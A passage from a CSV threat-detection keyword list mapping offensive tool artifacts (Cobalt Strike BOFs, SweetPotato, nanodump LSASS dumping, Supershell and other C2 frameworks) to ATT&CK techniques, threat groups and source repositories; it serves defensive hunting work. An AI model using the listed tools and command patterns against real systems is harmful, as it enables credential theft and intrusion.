T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","570","129","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" +"*sullo/nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*SunloginClient_11.0.0.33162_X64.exe*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*superhedgy/AttackSurfaceMapper*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*SupportScam:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*suspended_run *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*svc_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SW2_GetSyscallNumber*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_GetSyscallNumber*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW2_HashSyscall*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_PopulateSyscallList*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_PopulateSyscallList*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW2_RVA2VA*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*SW2_RVA2VA*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*SW3_GetSyscallAddress*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*swaks --to * --from * --header *Subject: * --body * --server *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SwampThing.exe*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SWbemServicesImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SweetPotato.cna*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.csproj*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.exe*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SweetPotato.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SweetPotato.ImpersonationToken*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato.sln*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*SweetPotato-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*sweetsoftware/Ares*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*swisskyrepo/SharpLAPS*","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","338","68","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" +"*swisskyrepo/SSRFmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SwitchPriv.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*SxNade/Rudrastra*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*synacktiv/GPOddity*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - 